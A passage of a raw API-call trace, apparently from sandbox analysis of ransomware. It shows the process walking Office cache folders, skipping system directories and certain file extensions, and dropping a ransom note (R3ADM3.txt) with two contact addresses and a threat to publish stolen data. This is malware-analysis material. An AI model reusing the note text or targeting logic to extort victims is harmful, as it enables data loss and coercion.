ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0148.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.241] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeae20 | out: hHeap=0xea0000) returned 1 [0148.241] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0148.241] Sleep (dwMilliseconds=0x32) [0148.423] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0148.423] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0148.423] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0148.423] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.423] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0148.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.424] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.424] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae20 [0148.424] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.424] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcff8 [0148.424] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcff8 | out: hHeap=0xea0000) returned 1 [0148.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeae20 | out: hHeap=0xea0000) returned 1 [0148.424] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0148.579] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0148.579] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0148.580] CloseHandle (hObject=0x6dc) returned 1 [0148.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.580] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d935010, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d935010, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0148.580] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0148.580] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d935010, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d935010, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.580] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0148.580] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0148.581] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0148.581] lstrcmpW (lpString1="GrooveLR.cab", lpString2=".") returned 1 [0148.581] lstrcmpW (lpString1="GrooveLR.cab", lpString2="..") returned 1 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".UAKXC") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".exe") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".dll") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".lnk") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".sys") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".msi") returned 0x0 [0148.581] StrStrIW (lpFirst="GrooveLR.cab", lpSrch="R3ADM3.txt") returned 0x0 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabf0 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeabf0 | out: hHeap=0xea0000) returned 1 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeabf0 [0148.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef56c8 [0148.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.582] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0148.582] lstrcmpW (lpString1="GrooveMUI.msi", lpString2=".") returned 1 [0148.582] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="..") returned 1 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".UAKXC") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".exe") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".dll") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".lnk") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".sys") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".msi") returned=".msi" [0148.582] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0148.582] lstrcmpW (lpString1="GrooveMUI.xml", lpString2=".") returned 1 [0148.582] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="..") returned 1 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".UAKXC") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".exe") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".dll") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".lnk") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".sys") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".msi") returned 0x0 [0148.582] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae20 [0148.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeae20 | out: hHeap=0xea0000) returned 1 [0148.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae20 [0148.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6880 [0148.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.583] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5d935010, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5d935010, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5d935010, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0148.583] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0148.583] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0148.583] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0148.583] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0148.583] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0148.583] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0148.583] StrStrIW (lpFirst="Setup.xml", lpSrch=".UAKXC") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch=".exe") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch=".dll") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch=".lnk") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch=".sys") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch=".msi") returned 0x0 [0148.584] StrStrIW (lpFirst="Setup.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadf8 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeadf8 | out: hHeap=0xea0000) returned 1 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadf8 [0148.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef6928 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.584] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0148.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeae48 | out: hHeap=0xea0000) returned 1 [0148.585] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0148.585] Sleep (dwMilliseconds=0x32) [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddcb8 | out: hHeap=0xea0000) returned 1 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddcb8 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae48 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcd50 [0148.687] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcd50 | out: hHeap=0xea0000) returned 1 [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeae48 | out: hHeap=0xea0000) returned 1 [0148.687] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\R3ADM3.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0148.887] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0148.888] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0148.888] CloseHandle (hObject=0x6dc) returned 1 [0148.889] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.889] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.889] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5dc2eb90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5dc2eb90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0148.889] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0148.889] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5dc2eb90, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5dc2eb90, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.889] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0148.889] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0148.889] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0148.889] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0148.889] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0148.889] StrStrIW (lpFirst="1033", lpSrch="tmp") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="winnt") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="temp") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="thumb") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="$Recycle.Bin") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="$RECYCLE.BIN") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="System Volume Information") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="Boot") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="Windows") returned 0x0 [0148.889] StrStrIW (lpFirst="1033", lpSrch="Trend Micro") returned 0x0 [0148.889] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeae48 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeedac8 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.890] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0148.890] lstrcmpW (lpString1="branding.xml", lpString2=".") returned 1 [0148.890] lstrcmpW (lpString1="branding.xml", lpString2="..") returned 1 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".UAKXC") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".exe") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".dll") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".lnk") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".sys") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch=".msi") returned 0x0 [0148.890] StrStrIW (lpFirst="branding.xml", lpSrch="R3ADM3.txt") returned 0x0 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadd0 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedcf70 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xbe) returned 0xf811c0 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedcf70 | out: hHeap=0xea0000) returned 1 [0148.890] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeadd0 | out: hHeap=0xea0000) returned 1 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5770 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeadd0 [0148.890] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef69d0 [0148.891] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.891] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0148.891] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0148.891] lstrcmpW (lpString1="DW20.EXE", lpString2=".") returned 1 [0148.891] lstrcmpW (lpString1="DW20.EXE", lpString2="..") returned 1 [0148.891] StrStrIW (lpFirst="DW20.EXE", lpSrch=".UAKXC") returned 0x0 [0148.891] StrStrIW (lpFirst="DW20.EXE", lpSrch=".exe") returned=".EXE" [0148.891] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0148.891] lstrcmpW (lpString1="dwdcw20.dll", lpString2=".") returned 1 [0148.891] lstrcmpW (lpString1="dwdcw20.dll", lpString2="..") returned 1 [0148.891] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".UAKXC") returned 0x0 [0148.891] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".exe") returned 0x0 [0148.891] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".dll") returned=".dll" 